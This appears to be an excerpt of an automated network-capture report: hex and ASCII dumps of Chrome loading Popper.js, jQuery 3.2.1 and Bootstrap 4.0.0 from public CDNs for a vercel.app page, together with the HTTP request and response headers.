65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b
                          Data Ascii: ame;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K
                          2024-07-09 09:33:22 UTC1369INData Raw: 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66
                          Data Ascii: ,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}f
                          2024-07-09 09:33:22 UTC1369INData Raw: 2c 69 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75
                          Data Ascii: ,i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=argu


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.749709151.101.66.1374432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:22 UTC664OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                          Host: code.jquery.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://jd-amber.vercel.app
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: script
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:22 UTC567INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 69597
                          Server: nginx
                          Content-Type: application/javascript; charset=utf-8
                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                          ETag: "28feccc0-10fdd"
                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                          Access-Control-Allow-Origin: *
                          Via: 1.1 varnish, 1.1 varnish
                          Accept-Ranges: bytes
                          Age: 1722974
                          Date: Tue, 09 Jul 2024 09:33:22 GMT
                          X-Served-By: cache-lga21963-LGA, cache-nyc-kteb1890034-NYC
                          X-Cache: HIT, HIT
                          X-Cache-Hits: 46, 0
                          X-Timer: S1720517602.364413,VS0,VE1
                          Vary: Accept-Encoding
                          2024-07-09 09:33:22 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                          Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                          2024-07-09 09:33:22 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                          Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                          2024-07-09 09:33:22 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                          Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                          2024-07-09 09:33:22 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                          Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                          2024-07-09 09:33:22 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                          Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                          2024-07-09 09:33:22 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                          Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                          2024-07-09 09:33:22 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                          Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                          2024-07-09 09:33:22 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                          Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                          2024-07-09 09:33:22 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                          Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                          2024-07-09 09:33:22 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                          Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.749707104.18.11.2074432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:22 UTC683OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                          Host: maxcdn.bootstrapcdn.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://jd-amber.vercel.app
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: script
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:22 UTC956INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:22 GMT
                          Content-Type: application/javascript; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Vary: Accept-Encoding
                          Vary: Accept-Encoding
                          CDN-PullZone: 252412
                          CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                          CDN-RequestCountryCode: US
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=31919000
                          ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                          Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                          CDN-ProxyVer: 1.04
                          CDN-RequestPullSuccess: True
                          CDN-RequestPullCode: 200
                          CDN-CachedAt: 04/02/2024 02:05:57
                          CDN-EdgeStorageId: 1067
                          timing-allow-origin: *
                          cross-origin-resource-policy: cross-origin
                          X-Content-Type-Options: nosniff
                          CDN-Status: 200
                          CDN-RequestId: 5fa4f8fc20d380e66b2b822bcb6cff14
                          CDN-Cache: HIT
                          CF-Cache-Status: HIT
                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                          Server: cloudflare
                          CF-RAY: 8a074fe6da1f6a5c-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-09 09:33:22 UTC413INData Raw: 37 62 66 37 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                          Data Ascii: 7bf7/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                          2024-07-09 09:33:22 UTC1369INData Raw: 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28
                          Data Ascii: rts","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(
                          2024-07-09 09:33:22 UTC1369INData Raw: 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22
                          Data Ascii: ){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"
                          2024-07-09 09:33:22 UTC1369INData Raw: 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e
                          Data Ascii: (u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElemen
